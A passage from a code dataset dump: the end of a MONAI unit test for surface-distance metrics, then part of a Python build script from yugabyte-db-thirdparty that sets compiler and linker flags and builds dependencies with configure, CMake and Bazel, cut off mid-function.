[\n [\n create_spherical_seg_3d(radius=20, centre=(20, 33, 22)),\n create_spherical_seg_3d(radius=40, centre=(20, 33, 22)),\n 1,\n ],\n [13.975673696300824, 12.040033513150455],\n ],\n [\n [\n create_spherical_seg_3d(radius=20, centre=(20, 33, 22)),\n create_spherical_seg_3d(radius=40, centre=(20, 33, 22)),\n 1,\n \"chessboard\",\n ],\n [10.792254295459173, 9.605067064083457],\n ],\n [\n [\n create_spherical_seg_3d(radius=20, centre=(20, 33, 22)),\n create_spherical_seg_3d(radius=40, centre=(20, 33, 22)),\n 1,\n \"taxicab\",\n ],\n [17.32691760951026, 12.432687531048186],\n ],\n [\n [\n np.zeros([99, 99, 99]),\n create_spherical_seg_3d(radius=40, centre=(20, 33, 22)),\n 1,\n ],\n [np.inf, np.inf],\n ],\n [\n [\n np.zeros([99, 99, 99]),\n np.zeros([99, 99, 99]),\n 1,\n ],\n [np.inf, np.inf],\n ],\n [\n [\n create_spherical_seg_3d(),\n np.zeros([99, 99, 99]),\n 1,\n \"taxicab\",\n ],\n [np.inf, np.inf],\n ],\n]\n\n\nclass TestAllSurfaceMetrics(unittest.TestCase):\n @parameterized.expand(TEST_CASES)\n def test_value(self, input_data, expected_value):\n if len(input_data) == 4:\n [seg_1, seg_2, label_idx, metric] = input_data\n else:\n [seg_1, seg_2, label_idx] = input_data\n metric = \"euclidean\"\n ct = 0\n for symmetric in [True, False]:\n expected_value_curr = expected_value[ct]\n result = compute_average_surface_distance(\n seg_1, seg_2, label_idx, symmetric=symmetric, distance_metric=metric\n )\n np.testing.assert_allclose(expected_value_curr, result, rtol=1e-7)\n ct += 1\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"precision-medicine-um/MONAI-Deep_Learning","sub_path":"tests/test_surface_distance.py","file_name":"test_surface_distance.py","file_ext":"py","file_size_in_byte":3918,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"12006270250","text":"import argparse\nimport hashlib\nimport json\nimport os\nimport platform\nimport subprocess\nimport stat\nimport time\nimport re\n\nfrom re import Pattern\n\nfrom typing import Optional, List, Set, Tuple, Dict, Any, Callable, cast\n\nfrom sys_detection import is_macos, is_linux\nfrom pathlib import Path\n\nfrom build_definitions import (\n BuildGroup,\n BuildType,\n get_build_def_module,\n get_deps_from_module_names,\n)\n\nfrom build_definitions.tcmalloc import TCMallocDependency\n\nfrom yugabyte_db_thirdparty.builder_helpers import (\n format_cmake_args_for_log,\n get_make_parallelism,\n get_rpath_flag,\n log_and_set_env_var_to_list,\n PLACEHOLDER_RPATH,\n)\nfrom yugabyte_db_thirdparty.builder_helpers import is_ninja_available\nfrom yugabyte_db_thirdparty.builder_interface import BuilderInterface\nfrom yugabyte_db_thirdparty.cmd_line_args import parse_cmd_line_args\nfrom yugabyte_db_thirdparty.compiler_choice import CompilerChoice\nfrom yugabyte_db_thirdparty.custom_logging import (\n colored_log,\n fatal,\n heading,\n log,\n log_output_internal,\n SEPARATOR,\n YELLOW_COLOR,\n)\nfrom yugabyte_db_thirdparty.dependency import Dependency\nfrom yugabyte_db_thirdparty.devtoolset import activate_devtoolset\nfrom yugabyte_db_thirdparty.download_manager import DownloadManager\nfrom yugabyte_db_thirdparty.env_helpers import write_env_vars\nfrom yugabyte_db_thirdparty.string_util import indent_lines\nfrom yugabyte_db_thirdparty.arch import (\n get_arch_switch_cmd_prefix,\n get_target_arch,\n get_other_macos_arch,\n add_homebrew_to_path,\n)\nfrom yugabyte_db_thirdparty import util\nfrom yugabyte_db_thirdparty.util import (\n assert_dir_exists,\n assert_list_contains,\n EnvVarContext,\n PushDir,\n read_file,\n remove_path,\n YB_THIRDPARTY_DIR,\n add_path_entry,\n shlex_join,\n)\nfrom yugabyte_db_thirdparty.file_system_layout import FileSystemLayout\nfrom yugabyte_db_thirdparty import file_system_layout\nfrom yugabyte_db_thirdparty.toolchain import Toolchain, ensure_toolchains_installed\nfrom yugabyte_db_thirdparty.clang_util import (\n get_clang_library_dir,\n get_clang_include_dir,\n create_llvm_tool_dir,\n)\nfrom yugabyte_db_thirdparty.macos import get_min_supported_macos_version\nfrom yugabyte_db_thirdparty.linuxbrew import get_linuxbrew_dir, using_linuxbrew, set_linuxbrew_dir\nfrom yugabyte_db_thirdparty.constants import (\n COMPILER_WRAPPER_ENV_VAR_NAME_LD_FLAGS_TO_APPEND,\n COMPILER_WRAPPER_ENV_VAR_NAME_LD_FLAGS_TO_REMOVE,\n)\nfrom yugabyte_db_thirdparty import (\n compile_commands,\n constants,\n git_util,\n)\n\n# -------------------------------------------------------------------------------------------------\n\nASAN_COMPILER_FLAGS = [\n '-fsanitize=address',\n '-fsanitize=undefined',\n '-DADDRESS_SANITIZER',\n]\n\nASAN_LD_FLAGS = [\n '-Wl,--allow-shlib-undefined',\n '-Wl,--unresolved-symbols=ignore-all'\n]\n\nTSAN_COMPILER_FLAGS = [\n '-fsanitize=thread',\n '-DTHREAD_SANITIZER',\n]\n\n# https://github.com/aws/aws-graviton-getting-started/blob/main/c-c++.md\nGRAVITON_COMPILER_FLAGS = [\n '-march=armv8.2-a+fp16+rcpc+dotprod+crypto',\n '-mtune=neoverse-n1',\n '-mno-outline-atomics',\n]\n\n# We create a file named like this in each dependency's build directory, with all the relevant\n# environment variables that we set.\nDEPENDENCY_ENV_FILE_NAME = 'yb_dependency_env.sh'\n\n# If this pattern appears, we should use the CPPFLAGS environment variable for this dependency\nDISALLOWED_CONFIGURE_OUTPUT_RE = re.compile(\n '(C|CXX)FLAGS should only be used to specify C compiler flags, not include directories[.]')\n\n\ndef extend_lists(lists: List[List[str]], to_add: List[str]) -> None:\n for list_to_extend in lists:\n list_to_extend.extend(to_add.copy())\n\n\nclass Builder(BuilderInterface):\n args: argparse.Namespace\n\n # TODO: move flag management out from here into a separate class.\n\n # Linker flags.\n ld_flags: List[str]\n\n assembler_flags: List[str]\n\n executable_only_ld_flags: List[str]\n\n # These flags apply to both C and C++ compilers. Do not add preprocessor flags (e.g. include\n # directories, system include directories, etc.) here.\n compiler_flags: List[str]\n\n # Based on the dependency, we either set CPPFLAGS based on this, or add them to CFLAGS/CXXFLAGS.\n # For CMake dependencies, we always add them to compiler flags.\n preprocessor_flags: List[str]\n\n # Flags specific for C and C++ compilers.\n c_flags: List[str]\n cxx_flags: List[str]\n\n libs: List[str]\n additional_allowed_shared_lib_paths: Set[str]\n download_manager: DownloadManager\n compiler_choice: CompilerChoice\n fs_layout: FileSystemLayout\n fossa_deps: List[Any]\n toolchain: Optional[Toolchain]\n remote_build: bool\n\n dependencies: List[Dependency]\n dependencies_by_name: Dict[str, Dependency]\n\n lto_type: Optional[str]\n selected_dependencies: List[Dependency]\n\n # Mapping from e.g. com_google_tcmalloc or com_google_absl to the corresponding build\n # directories.\n bazel_path_mapping: Dict[str, str]\n\n \"\"\"\n This class manages the overall process of building third-party dependencies, including the set\n of dependencies to build, build types, and the directories to install dependencies.\n \"\"\"\n def __init__(self) -> None:\n self.linuxbrew_dir = None\n self.additional_allowed_shared_lib_paths = set()\n\n self.toolchain = None\n self.fossa_deps = []\n self.lto_type = None\n\n self.dependencies = []\n self.dependencies_by_name = {}\n\n def install_toolchains(self) -> None:\n toolchains = ensure_toolchains_installed(\n self.download_manager, self.args.toolchain.split('_'))\n\n # We expect at most one Linuxbrew toolchain to be specified (handled by set_linuxbrew_dir).\n for toolchain in toolchains:\n if toolchain.toolchain_type == 'linuxbrew':\n set_linuxbrew_dir(toolchain.toolchain_root)\n\n if len(toolchains) == 1:\n self.toolchain = toolchains[0]\n return\n if len(toolchains) != 2:\n raise ValueError(\"Unsupported combination of toolchains: %s\" % self.args.toolchain)\n if not toolchains[0].toolchain_type.startswith('llvm'):\n raise ValueError(\n \"For a combination of toolchains, the first one must be an LLVM one, got: %s\" %\n toolchains[0].toolchain_type)\n self.toolchain = toolchains[0]\n if toolchains[1].toolchain_type != 'linuxbrew':\n raise ValueError(\n \"For a combination of toolchains, the second one must be Linuxbrew, got: %s\" %\n toolchains[1].toolchain_type)\n\n def determine_compiler_family_and_prefix(self) -> Tuple[str, Optional[str]]:\n compiler_family: Optional[str] = None\n compiler_prefix: Optional[str] = None\n if self.args.toolchain:\n self.install_toolchains()\n assert self.toolchain is not None # install_toolchains guarantees this.\n compiler_prefix = self.toolchain.toolchain_root\n self.toolchain.write_url_and_path_files()\n if self.args.toolchain.startswith('llvm'):\n compiler_family = 'clang'\n elif self.args.devtoolset:\n compiler_family = 'gcc'\n elif self.args.compiler_prefix:\n compiler_prefix = self.args.compiler_prefix\n\n if is_macos():\n if compiler_family is None:\n compiler_family = 'clang'\n elif compiler_family != 'clang':\n raise ValueError(\"Only clang compiler family is supported on macOS\")\n\n if self.args.compiler_family is not None:\n if compiler_family is None:\n compiler_family = self.args.compiler_family\n elif compiler_family != self.args.compiler_family:\n raise ValueError(\"Compiler type specified on the command line is %s, \"\n \"but automatically determined as %s\" % (self.args.compiler_family,\n compiler_family))\n\n if compiler_family is None:\n raise ValueError(\n \"Could not determine compiler family. Use --compiler-family to disambiguate.\")\n return compiler_family, compiler_prefix\n\n def parse_args(self) -> None:\n self.args = parse_cmd_line_args()\n\n self.remote_build = self.args.remote_build_server and self.args.remote_build_dir\n if self.remote_build:\n return\n\n if self.args.make_parallelism:\n os.environ['YB_MAKE_PARALLELISM'] = str(self.args.make_parallelism)\n\n self.fs_layout = FileSystemLayout()\n\n if self.args.dev_repo:\n for dev_repo_mapping in self.args.dev_repo:\n self.fs_layout.add_dev_repo_mapping(dev_repo_mapping)\n\n self.download_manager = DownloadManager(\n should_add_checksum=self.args.add_checksum,\n download_dir=self.fs_layout.tp_download_dir)\n\n compiler_family, compiler_prefix = self.determine_compiler_family_and_prefix()\n\n if self.args.devtoolset is not None:\n activate_devtoolset(self.args.devtoolset)\n self.compiler_choice = CompilerChoice(\n compiler_family=compiler_family,\n compiler_prefix=compiler_prefix,\n compiler_suffix=self.args.compiler_suffix,\n devtoolset=self.args.devtoolset,\n use_ccache=self.args.use_ccache,\n expected_major_compiler_version=self.args.expected_major_compiler_version\n )\n\n llvm_major_version: Optional[int] = self.compiler_choice.get_llvm_major_version()\n if llvm_major_version:\n if using_linuxbrew():\n log(\"Automatically enabling compiler wrapper for a Clang Linuxbrew-targeting build\")\n log(\"Disallowing the use of headers in /usr/include\")\n os.environ['YB_DISALLOWED_INCLUDE_DIRS'] = '/usr/include'\n self.args.use_compiler_wrapper = True\n if llvm_major_version >= 13:\n log(\"Automatically enabling compiler wrapper for Clang major version 13 or higher\")\n self.args.use_compiler_wrapper = True\n\n self.lto_type = self.args.lto\n\n def finish_initialization(self) -> None:\n self.fs_layout.finish_initialization(\n per_build_subdirs=(\n True if self.args.per_build_dirs else\n (False if self.args.no_per_build_dirs else None)\n ),\n compiler_choice=self.compiler_choice,\n lto_type=self.args.lto)\n self.populate_dependencies()\n self.select_dependencies_to_build()\n self.compiler_choice.set_compiler(use_compiler_wrapper=False)\n\n def populate_dependencies(self) -> None:\n # We have to use get_build_def_module to access submodules of build_definitions,\n # otherwise MyPy gets confused.\n\n self.dependencies = get_deps_from_module_names([\n # Avoiding a name collision with the standard zlib module, hence \"zlib_dependency\".\n 'zlib_dependency',\n 'lz4',\n 'openssl',\n 'libev',\n 'rapidjson',\n 'squeasel',\n 'curl',\n 'hiredis',\n 'cqlsh',\n 'flex',\n 'bison',\n 'openldap',\n 'redis_cli',\n 'wyhash',\n 'jwt_cpp',\n ])\n for dep in self.dependencies:\n if dep.build_group != BuildGroup.COMMON:\n raise ValueError(\n \"Expected the initial group of dependencies to all be in the common build \"\n f\"group, found: {dep.build_group} for dependency {dep.name}\")\n\n if is_linux():\n self.dependencies += [\n get_build_def_module('libuuid').LibUuidDependency(),\n ]\n\n llvm_major_version: Optional[int] = self.compiler_choice.get_llvm_major_version()\n if (self.compiler_choice.is_clang() and\n llvm_major_version is not None and llvm_major_version >= 10):\n if self.toolchain:\n llvm_version_str = self.toolchain.get_llvm_version_str()\n else:\n llvm_version_str = self.compiler_choice.get_llvm_version_str()\n\n self.dependencies.append(\n get_build_def_module('llvm_libunwind').LlvmLibUnwindDependency(\n version=llvm_version_str\n ))\n libcxx_dep_module = get_build_def_module('llvm_libcxx')\n if llvm_major_version >= 13:\n self.dependencies.append(\n libcxx_dep_module.LibCxxWithAbiDependency(version=llvm_version_str))\n else:\n # It is important that we build libc++abi first, and only then build libc++.\n self.dependencies += [\n libcxx_dep_module.LlvmLibCxxAbiDependency(version=llvm_version_str),\n libcxx_dep_module.LlvmLibCxxDependency(version=llvm_version_str),\n ]\n else:\n self.dependencies.append(get_build_def_module('libunwind').LibUnwindDependency())\n\n self.dependencies.append(get_build_def_module('libbacktrace').LibBacktraceDependency())\n\n self.dependencies += get_deps_from_module_names(\n # On macOS, flex, bison, and krb5 depend on gettext, and we don't want to use gettext\n # from Homebrew.\n # libunistring is required by gettext.\n (\n ['libunistring', 'gettext'] if is_macos() else []\n ) + [\n 'ncurses',\n ] + (\n [] if is_macos() else ['libkeyutils', 'libverto', 'abseil', 'tcmalloc']\n ) + [\n 'libedit',\n 'icu4c',\n 'protobuf',\n 'crypt_blowfish',\n 'boost',\n 'gflags',\n 'glog',\n 'gperftools',\n 'googletest',\n 'snappy',\n 'crcutil',\n 'libcds',\n 'libuv',\n 'cassandra_cpp_driver',\n 'krb5',\n 'hdrhistogram',\n 'otel_proto',\n 'otel'\n ])\n for dep in self.dependencies:\n if dep.name in self.dependencies_by_name:\n raise ValueError(\"Duplicate dependency: %s\" % dep.name)\n self.dependencies_by_name[dep.name] = dep\n abseil_dep = self.dependencies_by_name.get('abseil')\n if abseil_dep is not None:\n tcmalloc_dep = cast(TCMallocDependency, self.dependencies_by_name['tcmalloc'])\n tcmalloc_dep.set_abseil_source_dir_basename(abseil_dep.get_source_dir_basename())\n\n def select_dependencies_to_build(self) -> None:\n self.selected_dependencies = []\n if self.args.dependencies:\n names = set([dep.name for dep in self.dependencies])\n for dep in self.args.dependencies:\n if dep not in names:\n fatal(\"Unknown dependency name: %s. Valid dependency names:\\n%s\",\n dep,\n (\" \" * 4 + (\"\\n\" + \" \" * 4).join(sorted(names))))\n for dep in self.dependencies:\n if dep.name in self.args.dependencies:\n self.selected_dependencies.append(dep)\n elif self.args.skip:\n skipped = set(self.args.skip.split(','))\n log(\"Skipping dependencies: %s\", sorted(skipped))\n self.selected_dependencies = []\n for dependency in self.dependencies:\n if dependency.name in skipped:\n skipped.remove(dependency.name)\n else:\n self.selected_dependencies.append(dependency)\n if skipped:\n raise ValueError(\"Unknown dependencies, cannot skip: %s\" % sorted(skipped))\n else:\n self.selected_dependencies = self.dependencies\n\n def _setup_path(self) -> None:\n add_path_entry(os.path.join(self.fs_layout.tp_installed_common_dir, 'bin'))\n add_homebrew_to_path()\n if self.compiler_choice.is_linux_clang():\n llvm_tool_dir = self.fs_layout.get_llvm_tool_dir()\n if create_llvm_tool_dir(self.compiler_choice.get_c_compiler(), llvm_tool_dir):\n add_path_entry(llvm_tool_dir)\n\n def run(self) -> None:\n if is_macos() and get_target_arch() == 'x86_64':\n os.environ['MACOSX_DEPLOYMENT_TARGET'] = get_min_supported_macos_version()\n if self.args.clean or self.args.clean_downloads:\n self.fs_layout.clean(self.selected_dependencies, self.args.clean_downloads)\n self.prepare_out_dirs()\n self._setup_path()\n\n # Populate the mapping from Bazel project subdirectory names to build directories.\n # This is used for generating compilation commands. We do not use ASAN/TSAN builds for this.\n self.bazel_path_mapping = {}\n for dep in self.dependencies:\n if dep.bazel_project_subdir_name is not None:\n build_root = self.fs_layout.get_build_dir_for_dependency(\n dep, dep.build_group.default_build_type())\n self.bazel_path_mapping[dep.bazel_project_subdir_name] = build_root\n\n self.build_one_build_type(BuildType.COMMON)\n build_types = [BuildType.UNINSTRUMENTED]\n\n if (is_linux() and\n self.compiler_choice.is_clang() and\n not self.args.skip_sanitizers and\n not using_linuxbrew() and\n # With --postprocess-compile-commands-only, we don't need to build ASAN/TSAN.\n not self.args.postprocess_compile_commands_only):\n # We only support ASAN/TSAN builds on Clang, when not using Linuxbrew.\n if not self.args.skip_asan:\n build_types.append(BuildType.ASAN)\n if not self.args.skip_tsan:\n build_types.append(BuildType.TSAN)\n log(f\"Full list of build types: {build_types}\")\n\n for build_type in build_types:\n self.build_one_build_type(build_type)\n\n fossa_config_deps = {\"remote-dependencies\": self.fossa_deps}\n with open(os.path.join(YB_THIRDPARTY_DIR, 'fossa-deps.json'), 'w') as output_file:\n json.dump(fossa_config_deps, output_file, indent=2)\n\n def prepare_out_dirs(self) -> None:\n dirs = [\n os.path.join(self.fs_layout.tp_installed_dir, build_type.dir_name())\n for build_type in BuildType\n ]\n libcxx_dirs = [os.path.join(dir_path, 'libcxx') for dir_path in dirs]\n for dir_path in dirs + libcxx_dirs:\n if self.args.verbose:\n log(\"Preparing output directory %s\", dir_path)\n util.mkdir_p(os.path.join(dir_path, 'bin'))\n lib_dir = os.path.join(dir_path, 'lib')\n util.mkdir_p(lib_dir)\n util.mkdir_p(os.path.join(dir_path, 'include'))\n # On some systems, autotools installs libraries to lib64 rather than lib. Fix this by\n # setting up lib64 as a symlink to lib. We have to do this step first to handle cases\n # where one third-party library depends on another.\n lib64_dir = os.path.join(dir_path, 'lib64')\n if os.path.exists(lib64_dir):\n if os.path.islink(lib64_dir):\n continue\n remove_path(lib64_dir)\n os.symlink('lib', lib64_dir)\n\n def add_include_path(self, include_path: str) -> None:\n if self.args.verbose:\n log(\"Adding an include path: %s\", include_path)\n cmd_line_arg = f'-I{include_path}'\n self.preprocessor_flags.append(cmd_line_arg)\n # Not adding to compiler_flags. We can add preprocessor flags to compiler flags when\n # building the dependency instead.\n\n def init_compiler_independent_flags(self, dep: Dependency) -> None:\n \"\"\"\n Initialize compiler and linker flags for a particular build type. We try to limit this\n function to flags that will work for most compilers we are using, which include various\n versions of GCC and Clang.\n \"\"\"\n self.preprocessor_flags = []\n self.ld_flags = []\n self.assembler_flags = []\n self.executable_only_ld_flags = []\n self.compiler_flags = []\n self.c_flags = []\n self.cxx_flags = []\n self.libs = []\n\n self.add_linuxbrew_flags()\n for build_type in set([BuildType.COMMON, self.build_type]):\n build_type_parent_dir = os.path.join(\n self.fs_layout.tp_installed_dir, build_type.dir_name())\n\n self.add_include_path(os.path.join(build_type_parent_dir, 'include'))\n self.add_lib_dir_and_rpath(os.path.join(build_type_parent_dir, 'lib'))\n\n self.compiler_flags += ['-fno-omit-frame-pointer', '-fPIC', '-O3', '-Wall']\n if is_linux():\n # On Linux, ensure we set a long enough rpath so we can change it later with chrpath,\n # patchelf, or a similar tool.\n self.add_rpath(PLACEHOLDER_RPATH)\n\n self.shared_lib_suffix = \"so\"\n\n # Currently linux/aarch64 build is optimized for Graviton2.\n if platform.uname().processor == 'aarch64':\n self.compiler_flags += GRAVITON_COMPILER_FLAGS\n\n elif is_macos():\n self.shared_lib_suffix = \"dylib\"\n\n # YugaByte builds with C++11, which on OS X requires using libc++ as the standard\n # library implementation. Some of the dependencies do not compile against libc++ by\n # default, so we specify it explicitly.\n self.cxx_flags.append(\"-stdlib=libc++\")\n self.ld_flags += [\"-lc++\", \"-lc++abi\"]\n\n # Build for macOS Mojave or later. See https://bit.ly/37myHbk\n extend_lists(\n [self.compiler_flags, self.ld_flags, self.assembler_flags],\n [\"-mmacosx-version-min=%s\" % get_min_supported_macos_version()])\n\n self.ld_flags.append(\"-Wl,-headerpad_max_install_names\")\n else:\n fatal(\"Unsupported platform: {}\".format(platform.system()))\n\n self.cxx_flags.append('-frtti')\n\n if self.build_type == BuildType.ASAN:\n self.compiler_flags += ASAN_COMPILER_FLAGS\n self.ld_flags += ASAN_LD_FLAGS\n\n if self.build_type == BuildType.TSAN:\n self.compiler_flags += TSAN_COMPILER_FLAGS\n\n def add_linuxbrew_flags(self) -> None:\n if using_linuxbrew():\n lib_dir = os.path.join(get_linuxbrew_dir(), 'lib')\n self.ld_flags.append(\" -Wl,-dynamic-linker={}\".format(os.path.join(lib_dir, 'ld.so')))\n self.add_lib_dir_and_rpath(lib_dir)\n\n def add_lib_dir_and_rpath(self, lib_dir: str) -> None:\n if self.args.verbose:\n log(\"Adding a library directory and RPATH at the end of linker flags: %s\", lib_dir)\n self.ld_flags.append(\"-L{}\".format(lib_dir))\n self.add_rpath(lib_dir)\n\n def prepend_lib_dir_and_rpath(self, lib_dir: str) -> None:\n if self.args.verbose:\n log(\"Adding a library directory and RPATH at the front of linker flags: %s\", lib_dir)\n self.ld_flags.insert(0, \"-L{}\".format(lib_dir))\n self.prepend_rpath(lib_dir)\n\n def add_rpath(self, path: str) -> None:\n log(\"Adding RPATH at the end of linker flags: %s\", path)\n self.ld_flags.append(get_rpath_flag(path))\n self.additional_allowed_shared_lib_paths.add(path)\n\n def prepend_rpath(self, path: str) -> None:\n log(\"Adding RPATH at the front of linker flags: %s\", path)\n self.ld_flags.insert(0, get_rpath_flag(path))\n self.additional_allowed_shared_lib_paths.add(path)\n\n def log_prefix(self, dep: Dependency) -> str:\n detail_components = self.compiler_choice.get_build_type_components(\n lto_type=self.lto_type, with_arch=False\n ) + [self.build_type.dir_name()]\n return '{} ({})'.format(dep.name, ', '.join(detail_components))\n\n def check_current_dir(self) -> None:\n current_dir = os.path.realpath(os.getcwd())\n top_dir = os.path.realpath(YB_THIRDPARTY_DIR)\n if current_dir == top_dir:\n raise IOError(\n \"Dependency build is not allowed to run with the current directory being \"\n f\"the top-level directory of yugabyte-db-thirdparty: {YB_THIRDPARTY_DIR}\")\n\n def build_with_configure(\n self,\n dep: Dependency,\n extra_args: List[str] = [],\n configure_cmd: List[str] = ['./configure'],\n install: List[str] = ['install'],\n run_autogen: bool = False,\n autoconf: bool = False,\n src_subdir_name: Optional[str] = None,\n post_configure_action: Optional[Callable] = None) -> None:\n self.check_current_dir()\n log_prefix = self.log_prefix(dep)\n dir_for_build = os.getcwd()\n if src_subdir_name:\n dir_for_build = os.path.join(dir_for_build, src_subdir_name)\n\n with PushDir(dir_for_build):\n log(\"Building in %s using the configure tool\", dir_for_build)\n try:\n if run_autogen:\n self.log_output(log_prefix, ['./autogen.sh'])\n if autoconf:\n self.log_output(log_prefix, ['autoreconf', '-i'])\n\n configure_args = (\n configure_cmd.copy() + ['--prefix={}'.format(self.prefix)] + extra_args\n )\n configure_args = get_arch_switch_cmd_prefix() + configure_args\n self.log_output(\n log_prefix,\n configure_args,\n disallowed_pattern=DISALLOWED_CONFIGURE_OUTPUT_RE)\n except Exception as ex:\n log(f\"The configure step failed. Looking for relevant files in {dir_for_build} \"\n f\"to show.\")\n num_files_shown = 0\n for root, dirs, files in os.walk('.'):\n for file_name in files:\n if file_name == 'config.log':\n file_path = os.path.abspath(os.path.join(root, file_name))\n log(\n f\"Contents of {file_path}:\\n\"\n f\"\\n\"\n f\"{read_file(file_path)}\\n\"\n f\"\\n\"\n f\"(End of {file_path}).\\n\"\n f\"\\n\"\n )\n num_files_shown += 1\n log(f\"Logged contents of {num_files_shown} relevant files in {dir_for_build}.\")\n raise\n\n if post_configure_action:\n post_configure_action()\n\n self.log_output(log_prefix, ['make', '-j{}'.format(get_make_parallelism())])\n if install:\n self.log_output(log_prefix, ['make'] + install)\n\n self.validate_build_output()\n\n def log_output(\n self,\n prefix: str,\n args: List[Any],\n disallowed_pattern: Optional[Pattern] = None) -> None:\n log_output_internal(\n prefix=prefix,\n args=args,\n disallowed_pattern=disallowed_pattern,\n color=not self.args.concise_output,\n hide_log_on_success=self.args.concise_output)\n\n def build_with_cmake(\n self,\n dep: Dependency,\n extra_args: List[str] = [],\n use_ninja_if_available: bool = True,\n src_subdir_name: Optional[str] = None,\n extra_build_tool_args: List[str] = [],\n should_install: bool = True,\n install_targets: List[str] = ['install'],\n shared_and_static: bool = False) -> None:\n self.check_current_dir()\n build_tool = 'make'\n if use_ninja_if_available:\n ninja_available = is_ninja_available()\n log('Ninja is %s', 'available' if ninja_available else 'unavailable')\n if ninja_available:\n build_tool = 'ninja'\n\n log(\"Building dependency %s using CMake. Build tool: %s\", dep, build_tool)\n log_prefix = self.log_prefix(dep)\n\n remove_path('CMakeCache.txt')\n remove_path('CMakeFiles')\n\n src_path = self.fs_layout.get_source_path(dep)\n if src_subdir_name is not None:\n src_path = os.path.join(src_path, src_subdir_name)\n\n args = ['cmake', src_path]\n if build_tool == 'ninja':\n args += ['-G', 'Ninja']\n args += self.get_common_cmake_flag_args(dep)\n if extra_args is not None:\n args += extra_args\n args += dep.get_additional_cmake_args(self)\n\n if shared_and_static and any(arg.startswith('-DBUILD_SHARED_LIBS=') for arg in args):\n raise ValueError(\n \"shared_and_static=True is specified but CMake arguments already mention \"\n \"-DBUILD_SHARED_LIBS: %s\" % args)\n\n if '-DBUILD_SHARED_LIBS=OFF' not in args and not shared_and_static:\n # TODO: a better approach for setting CMake arguments from multiple places.\n args.append('-DBUILD_SHARED_LIBS=ON')\n\n def do_build_with_cmake(additional_cmake_args: List[str] = []) -> None:\n final_cmake_args = args + additional_cmake_args\n log(\"CMake command line (one argument per line):\\n%s\" %\n format_cmake_args_for_log(final_cmake_args))\n cmake_configure_script_path = os.path.abspath('yb_build_with_cmake.sh')\n\n build_tool_cmd = [\n build_tool, '-j{}'.format(get_make_parallelism())\n ] + extra_build_tool_args\n\n log(\"Writing the command line for the CMake-based build to %s\",\n os.path.abspath(cmake_configure_script_path))\n with open(cmake_configure_script_path, 'w') as cmake_configure_script_file:\n cmake_configure_script_file.write('\\n'.join([\n '#!/usr/bin/env bash',\n 'set -euxo pipefail',\n 'cd \"$( dirname \"$0\" )\"',\n '. \"./%s\"' % DEPENDENCY_ENV_FILE_NAME,\n shlex_join(final_cmake_args,\n one_arg_per_line=True),\n shlex_join(build_tool_cmd)\n ]) + '\\n')\n os.chmod(cmake_configure_script_path,\n stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR | stat.S_IRGRP | stat.S_IWGRP |\n stat.S_IROTH)\n\n self.log_output(log_prefix, final_cmake_args)\n\n if build_tool == 'ninja':\n dep.postprocess_ninja_build_file(self, 'build.ninja')\n\n self.log_output(log_prefix, build_tool_cmd)\n\n if should_install:\n self.log_output(log_prefix, [build_tool] + install_targets)\n\n with open('compile_commands.json') as compile_commands_file:\n compile_commands = json.load(compile_commands_file)\n\n for command_item in compile_commands:\n command_args = command_item['command'].split()\n if self.build_type == BuildType.ASAN:\n assert_list_contains(command_args, '-fsanitize=address')\n assert_list_contains(command_args, '-fsanitize=undefined')\n if self.build_type == BuildType.TSAN:\n assert_list_contains(command_args, '-fsanitize=thread')\n\n if shared_and_static:\n for build_shared_libs_value, subdir_name in (\n ('ON', 'shared'),\n ('OFF', 'static')\n ):\n build_dir = os.path.join(os.getcwd(), subdir_name)\n util.mkdir_p(build_dir)\n build_shared_libs_cmake_arg = '-DBUILD_SHARED_LIBS=%s' % build_shared_libs_value\n log(\"Building dependency '%s' for build type '%s' with option: %s\",\n dep.name, self.build_type, build_shared_libs_cmake_arg)\n with PushDir(build_dir):\n do_build_with_cmake([build_shared_libs_cmake_arg])\n self.validate_build_output()\n else:\n do_build_with_cmake()\n self.validate_build_output()\n\n def build_with_bazel(\n self,\n dep: Dependency,\n verbose_output: bool = True,\n should_clean: bool = True,\n targets: List[str] = []) -> None:\n log_prefix = self.log_prefix(dep)\n if should_clean:\n self.log_output(log_prefix, ['bazel', 'clean', '--expunge'])\n\n # Need to remove the space after isystem so replacing the space separators with colons\n # works properly.\n bazel_cxxopts = os.environ[\"CXXFLAGS\"].replace(\"isystem \", \"isystem\").replace(\" \", \":\")\n # Add stdlib=libc++ to avoid linking with libstdc++.\n bazel_linkopts = os.environ[\"LDFLAGS\"].replace(\" \", \":\")\n\n # Build without curses for more readable build output.\n build_command = [\"bazel\", \"build\", \"--curses=no\"]\n if verbose_output:\n build_command.append(\"--subcommands\")\n build_command += [\"--action_env\", f\"BAZEL_CXXOPTS={bazel_cxxopts}\"]\n build_command += [\"--action_env\", f\"BAZEL_LINKOPTS={bazel_linkopts}\"]\n\n # Need to explicitly pass environment variables which we want to be available.\n env_vars_to_copy = [\n \"CC\",\n \"CXX\",\n \"PATH\",\n \"YB_BAZEL_BUILD_DIR\",\n \"YB_THIRDPARTY_REAL_C_COMPILER\",\n \"YB_THIRDPARTY_REAL_CXX_COMPILER\",\n \"YB_THIRDPARTY_USE_CCACHE\",\n compile_commands.TMP_DIR_ENV_VAR_NAME,\n ]\n for env_var in env_vars_to_copy:\n if env_var not in os.environ:\n log(f\"Environment variable {env_var} not found. Not passing it to Bazel.\")\n continue\n build_command += [\"--action_env\", f\"{env_var}={os.environ[env_var]}\"]\n\n build_command.append(\"--verbose_failures\")\n\n build_script_path = 'yb_build_with_bazel.sh'\n with open(build_script_path, 'w') as build_script_file:\n build_script_file.write('\\n'.join([\n '#!/usr/bin/env bash',\n 'set -euxo pipefail',\n 'cd \"$( dirname \"$0\" )\"',\n '. \"./%s\"' % DEPENDENCY_ENV_FILE_NAME,\n 'for target in ' + shlex_join(targets) + '; do',\n ' ' + shlex_join(build_command) + ' \"$target\"',\n 'done',\n ]))\n os.chmod(build_script_path, 0o755)\n\n for target in targets:\n self.log_output(log_prefix, build_command + [target])\n\n def install_bazel_build_output(\n self,\n dep: Dependency,\n src_file: str,\n dest_file: str,\n src_folder: str,\n is_shared: bool) -> None:\n log_prefix = self.log_prefix(dep)\n src_path = f'bazel-bin/{src_folder}/{src_file}'\n dest_path = os.path.join(self.prefix_lib, dest_file)\n\n # Fix permissions on libraries. Bazel builds write-protected files by default, which\n # prevents overwriting when building thirdparty multiple times.\n self.log_output(log_prefix, ['chmod', '755' if is_shared else '644', src_path])\n 